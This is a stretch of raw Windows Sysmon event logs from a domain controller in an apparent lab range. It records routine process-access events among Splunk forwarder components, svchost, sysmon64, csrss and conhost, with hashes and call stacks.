AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.803{59A5CD1D-9274-6005-B904-00000000A301}45124928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.131{59A5CD1D-9273-6005-B804-00000000A301}34603900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 